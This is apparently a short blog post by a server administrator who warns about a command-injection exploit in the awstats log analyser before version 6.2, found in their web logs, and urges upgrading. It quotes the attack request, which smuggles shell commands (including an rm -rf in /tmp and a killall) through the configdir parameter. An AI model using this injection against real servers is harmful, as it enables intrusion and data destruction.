awstats exploit

Simple exploit may be sitting on your server… this apparently isn’t a new one but I don’t often review my web-logs manually anymore and just discovered quite by accident an exploit targetting the awstats log analyser, versions older than 6.2.

cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl ... 

Basically anything in between the pipe character “configdir=|some commands|” gets executed. Yes.

In this case they were pulling down from a Romanian server via wget a perl file made to look like a “session” file, containing an IRC server in perl, written by an Italian speaking programmer it seems.

Moral of story, sign up to yet another list or discontinue use of as many third party packages as possible—I already do this, awstats slipped in under the wire. Upgraded and secured now. Check your versions and logs…